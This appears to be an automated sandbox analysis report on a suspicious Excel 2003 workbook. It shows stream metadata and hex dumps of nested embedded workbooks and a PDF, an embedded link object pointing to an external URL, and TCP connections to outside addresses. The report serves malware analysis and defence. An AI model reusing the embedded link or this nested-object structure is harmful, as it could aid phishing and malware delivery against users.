                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                          General
                                          Stream Path:\x5DocumentSummaryInformation
                                          CLSID:
                                          File Type:data
                                          Stream Size:244
                                          Entropy:2.889430592781307
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                          General
                                          Stream Path:\x5SummaryInformation
                                          CLSID:
                                          File Type:data
                                          Stream Size:200
                                          Entropy:3.292068105701867
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . R . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                          Stream Path: MBD006D439E/\x1CompObj, File Type: data, Stream Size: 114
                                          General
                                          Stream Path:MBD006D439E/\x1CompObj
                                          CLSID:
                                          File Type:data
                                          Stream Size:114
                                          Entropy:4.25248375192737
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: MBD006D439E/\x5DocumentSummaryInformation, File Type: data, Stream Size: 248
                                          General
                                          Stream Path:MBD006D439E/\x5DocumentSummaryInformation
                                          CLSID:
                                          File Type:data
                                          Stream Size:248
                                          Entropy:2.7990677635209242
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C a i s s e 2 0 2 4 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a4 00 00 00
                                          Stream Path: MBD006D439E/\x5SummaryInformation, File Type: data, Stream Size: 244
                                          General
                                          Stream Path:MBD006D439E/\x5SummaryInformation
                                          CLSID:
                                          File Type:data
                                          Stream Size:244
                                          Entropy:3.8527227374003603
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t C o r p o r a t i o n . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . @ . . . . c ? . @ . . . . Q w R . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 70 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 02 00 00 00 e4 04 00 00
                                          Stream Path: MBD006D439E/MBD006D2A09/\x1CompObj, File Type: data, Stream Size: 114
                                          General
                                          Stream Path:MBD006D439E/MBD006D2A09/\x1CompObj
                                          CLSID:
                                          File Type:data
                                          Stream Size:114
                                          Entropy:4.25248375192737
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: MBD006D439E/MBD006D2A09/\x5DocumentSummaryInformation, File Type: data, Stream Size: 248
                                          General
                                          Stream Path:MBD006D439E/MBD006D2A09/\x5DocumentSummaryInformation
                                          CLSID:
                                          File Type:data
                                          Stream Size:248
                                          Entropy:3.0523231150355867
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
                                          Stream Path: MBD006D439E/MBD006D2A09/\x5SummaryInformation, File Type: data, Stream Size: 256
                                          General
                                          Stream Path:MBD006D439E/MBD006D2A09/\x5SummaryInformation
                                          CLSID:
                                          File Type:data
                                          Stream Size:256
                                          Entropy:4.119175032995043
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . + d R . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
                                          Stream Path: MBD006D439E/MBD006D2A09/MBD00049180/\x1CompObj, File Type: data, Stream Size: 94
                                          General
                                          Stream Path:MBD006D439E/MBD006D2A09/MBD00049180/\x1CompObj
                                          CLSID:
                                          File Type:data
                                          Stream Size:94
                                          Entropy:4.345966460061678
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: MBD006D439E/MBD006D2A09/MBD00049180/\x1Ole, File Type: data, Stream Size: 20
                                          General
                                          Stream Path:MBD006D439E/MBD006D2A09/MBD00049180/\x1Ole
                                          CLSID:
                                          File Type:data
                                          Stream Size:20
                                          Entropy:0.5689955935892812
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: MBD006D439E/MBD006D2A09/MBD00049180/CONTENTS, File Type: PDF document, version 1.7, 1 pages, Stream Size: 20909
                                          General
                                          Stream Path:MBD006D439E/MBD006D2A09/MBD00049180/CONTENTS
                                          CLSID:
                                          File Type:PDF document, version 1.7, 1 pages
                                          Stream Size:20909
                                          Entropy:7.967116806702583
                                          Base64 Encoded:True
                                          Data ASCII:% P D F - 1 . 7 . % . 1 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 2 0 R . / A c r o F o r m 3 0 R . > > . e n d o b j . 4 0 o b j . < < . / P r o d u c e r ( 3 . 0 . 4 \\ ( 5 . 0 . 8 \\ ) ) . / M o d D a t e ( D : 2 0 2 3 0 9 2 2 0 3 2 2 4 8 + 0 2 ' 0 0 ' ) . > > . e n d o b j . 2 0 o b j . < < . / T y p e / P a g e s . / K i d s [ 5 0 R ] . / C o u n t 1 . > > . e n d o b j . 3 0 o b j . < < . / F i e l d s [ ] . / D R 6 0 R . > > . e n d
                                          Data Raw:25 50 44 46 2d 31 2e 37 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 33 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 50 72 6f 64 75 63 65 72 20 28 33 2e 30 2e 34 20 5c 28 35 2e 30 2e 38 5c 29 20 29 0a 2f 4d 6f 64 44 61 74 65
                                          Stream Path: MBD006D439E/MBD006D2A09/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 134792
                                          General
                                          Stream Path:MBD006D439E/MBD006D2A09/Workbook
                                          CLSID:
                                          File Type:Applesoft BASIC program data, first line number 16
                                          Stream Size:134792
                                          Entropy:7.983675562880349
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . ) . D @ : 4 w . B . N S . . [ . . . . . R . . K . . . . . . . 3 . . . \\ . p . . . i . ) = @ . Y 9 u ? 8 . S q . . = N . . = . . x . ^ . > . ) i . . 7 Y . J ; . a ^ { B . . 2 m . . v 7 w . C . M c H , l U y , . W V B . . . g . a . . . 9 . . . . = . . . f 2 . . . . X . . . . < ) N > L . . . . . . . . . . . . . . ' [ . . . . . . . . J = . . . 2 ' . l C . @ . . . . . . . " . . . . . . . . 5 t . . . . . . . . 1 . . . p . S p . n . R . . h f ) z 1 . . . C E
                                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 f7 04 c7 29 d9 df ad 44 c7 40 ff 3a b9 34 77 ec 08 42 ea 18 b9 4e 81 a9 53 00 e1 12 5b 85 8f 9a 13 9f 01 d7 93 1e dc 9b 95 52 02 16 ba 4b f0 b0 e1 00 02 00 b0 04 c1 00 02 00 f0 33 e2 00 00 00 5c 00 70 00 0a ec 83 09 9b 69 df ad a9 29 9a d7 ef ea c1 3d 40 c6 d4 b9 a8 59 ec 39 75 3f 38 e7 0a d5
                                          Stream Path: MBD006D439E/MBD006D34A9/\x1CompObj, File Type: data, Stream Size: 114
                                          General
                                          Stream Path:MBD006D439E/MBD006D34A9/\x1CompObj
                                          CLSID:
                                          File Type:data
                                          Stream Size:114
                                          Entropy:4.25248375192737
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: MBD006D439E/MBD006D34A9/\x5DocumentSummaryInformation, File Type: data, Stream Size: 364
                                          General
                                          Stream Path:MBD006D439E/MBD006D34A9/\x5DocumentSummaryInformation
                                          CLSID:
                                          File Type:data
                                          Stream Size:364
                                          Entropy:3.4605270620647737
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . < . . . . . . . . . . . P . . . . . . . X . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . S h e e t 5 . . . . . S h e e t 6 . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 3c 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 78 00 00 00 0b 00 00 00 80 00 00 00 10 00 00 00 88 00 00 00 13 00 00 00 90 00 00 00 16 00 00 00 98 00 00 00 0d 00 00 00 a0 00 00 00 0c 00 00 00 17 01 00 00
                                          Stream Path: MBD006D439E/MBD006D34A9/\x5SummaryInformation, File Type: data, Stream Size: 264
                                          General
                                          Stream Path:MBD006D439E/MBD006D34A9/\x5SummaryInformation
                                          CLSID:
                                          File Type:data
                                          Stream Size:264
                                          Entropy:3.861977664967372
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . 4 . . @ . . . . 9 . @ . . . . C p R . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 02 00 00 00 58 00 00 00 04 00 00 00 70 00 00 00 08 00 00 00 84 00 00 00 12 00 00 00 94 00 00 00 0b 00 00 00 ac 00 00 00 0c 00 00 00 b8 00 00 00 0d 00 00 00 c4 00 00 00 13 00 00 00 d0 00 00 00
                                          Stream Path: MBD006D439E/MBD006D34A9/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 28794
                                          General
                                          Stream Path:MBD006D439E/MBD006D34A9/Workbook
                                          CLSID:
                                          File Type:Applesoft BASIC program data, first line number 16
                                          Stream Size:28794
                                          Entropy:3.895705393727193
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . x . < . - . 9 .
                                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 80 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                          Stream Path: MBD006D439E/MBd006D26D0/\x1CompObj, File Type: data, Stream Size: 114
                                          General
                                          Stream Path:MBD006D439E/MBd006D26D0/\x1CompObj
                                          CLSID:
                                          File Type:data
                                          Stream Size:114
                                          Entropy:4.219515110876372
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: MBD006D439E/MBd006D26D0/Package, File Type: Microsoft Excel 2007+, Stream Size: 14238
                                          General
                                          Stream Path:MBD006D439E/MBd006D26D0/Package
                                          CLSID:
                                          File Type:Microsoft Excel 2007+
                                          Stream Size:14238
                                          Entropy:7.304582151499508
                                          Base64 Encoded:True
                                          Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: MBD006D439E/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 215117
                                          General
                                          Stream Path:MBD006D439E/Workbook
                                          CLSID:
                                          File Type:Applesoft BASIC program data, first line number 16
                                          Stream Size:215117
                                          Entropy:7.7174755790684175
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . # . 8 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . . .
                                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                          Stream Path: MBd006D439F/\x1Ole, File Type: data, Stream Size: 660
                                          General
                                          Stream Path:MBd006D439F/\x1Ole
                                          CLSID:
                                          File Type:data
                                          Stream Size:660
                                          Entropy:4.594258403837487
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . F + . I . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . . . d . e . e . m . o . s . . . c . o . m . / . l . q . S . a . 1 . A . o . h . ? . & . l . i . n . e . n . = . f . r . i . g . h . t . e . n . e . d . & . t . r . u . m . p . e . t . . . . w 1 h _ x . A = c A q H v . u z U q . G J G E x M . r . w r 0 C . . . . . . . . . . . . . . . . . . . 1 . 8 . 9 . b . J . 8 . U . x . U . r . T . S . R . s . v . V . X . o . y . B . 6 . u . 2 . P . 8 . k . h . U . s . j
                                          Data Raw:01 00 00 02 09 da 46 2b c3 14 c4 49 00 00 00 00 00 00 00 00 00 00 00 00 a8 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b a4 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 2e 00 64 00 65 00 65 00 6d 00 6f 00 73 00 2e 00 63 00 6f 00 6d 00 2f 00 6c 00 71 00 53 00 61 00 31 00 41 00 6f 00 68 00 3f 00 26 00 6c 00 69 00 6e 00 65 00 6e 00 3d 00 66 00 72 00 69 00
                                          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 269152
                                          General
                                          Stream Path:Workbook
                                          CLSID:
                                          File Type:Applesoft BASIC program data, first line number 16
                                          Stream Size:269152
                                          Entropy:7.998093375369374
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . f T A ' ! . T V . . m h L } / . 8 . < . . [ I . . . . . . . 3 . . . \\ . p . F ` . y . 1 . r . 0 I Y . V & o ) b Q . k s 6 7 ` . d E K . . . ^ M s N V . . w . * i . H . . . > s . j l f 7 J . . 3 O c ] . . I A L B . . . H a . . . 6 . . . = . . . . . . . . . . x Q ( A . f j . . b 4 8 . . . 2 . . . . " . . . . P > . . . . P . . . . . . . . = . . . _ 4 4 . . m . t @ . . . # . . . . . . " . . . . ` . . . . % . . . ! y . . . B 1 . . . . . k K S . . ! . O
                                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 fb 11 c7 08 66 54 c5 41 e1 27 21 8d e0 c7 08 c5 ea 9a d0 54 56 a7 0b c3 2e 86 6d 68 4c 7d 2f 04 df c0 38 f1 ea 9a 05 bc 3c 0c 97 1c 5b 49 89 eb e1 00 02 00 b0 04 c1 00 02 00 8a 33 e2 00 00 00 5c 00 70 00 88 d1 46 cf 60 ed 19 79 0c cd 31 fa 01 72 2e 30 a1 d2 cd 49 fb 59 08 fe a5 f5 56 26 6f 9b

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 20, 2024 15:27:20.107749939 CET44349766162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:27:20.204436064 CET44349765162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:27:20.205360889 CET49765443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:27:20.300760984 CET44349766162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:27:20.325403929 CET44349765162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:27:20.352116108 CET49766443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:27:20.427903891 CET44349765162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:27:20.477066994 CET49765443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:05.369322062 CET49766443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:05.489061117 CET44349766162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:28:05.603270054 CET49765443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:05.722953081 CET44349765162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:28:23.128809929 CET49808443192.168.2.2414.103.79.10
                                          Dec 20, 2024 15:28:23.128839016 CET4434980814.103.79.10192.168.2.24
                                          Dec 20, 2024 15:28:23.128911018 CET49808443192.168.2.2414.103.79.10
                                          Dec 20, 2024 15:28:23.130486012 CET49808443192.168.2.2414.103.79.10
                                          Dec 20, 2024 15:28:23.130501986 CET4434980814.103.79.10192.168.2.24
                                          Dec 20, 2024 15:28:24.996534109 CET4434980814.103.79.10192.168.2.24
                                          Dec 20, 2024 15:28:24.996599913 CET49808443192.168.2.2414.103.79.10
                                          Dec 20, 2024 15:28:24.998259068 CET49808443192.168.2.2414.103.79.10
                                          Dec 20, 2024 15:28:24.998272896 CET4434980814.103.79.10192.168.2.24
                                          Dec 20, 2024 15:28:24.999306917 CET4434980814.103.79.10192.168.2.24
                                          Dec 20, 2024 15:28:24.999370098 CET49808443192.168.2.2414.103.79.10
                                          Dec 20, 2024 15:28:25.004148006 CET49808443192.168.2.2414.103.79.10
                                          Dec 20, 2024 15:28:25.004215956 CET4434980814.103.79.10192.168.2.24
                                          Dec 20, 2024 15:28:25.004259109 CET49808443192.168.2.2414.103.79.10
                                          Dec 20, 2024 15:28:25.004268885 CET4434980814.103.79.10192.168.2.24
                                          Dec 20, 2024 15:28:25.004313946 CET49808443192.168.2.2414.103.79.10
                                          Dec 20, 2024 15:28:25.015873909 CET49808443192.168.2.2414.103.79.10
                                          Dec 20, 2024 15:28:25.059334993 CET4434980814.103.79.10192.168.2.24
                                          Dec 20, 2024 15:28:25.766745090 CET4434980814.103.79.10192.168.2.24
                                          Dec 20, 2024 15:28:25.766832113 CET49808443192.168.2.2414.103.79.10
                                          Dec 20, 2024 15:28:25.766848087 CET4434980814.103.79.10192.168.2.24
                                          Dec 20, 2024 15:28:25.766870022 CET4434980814.103.79.10192.168.2.24
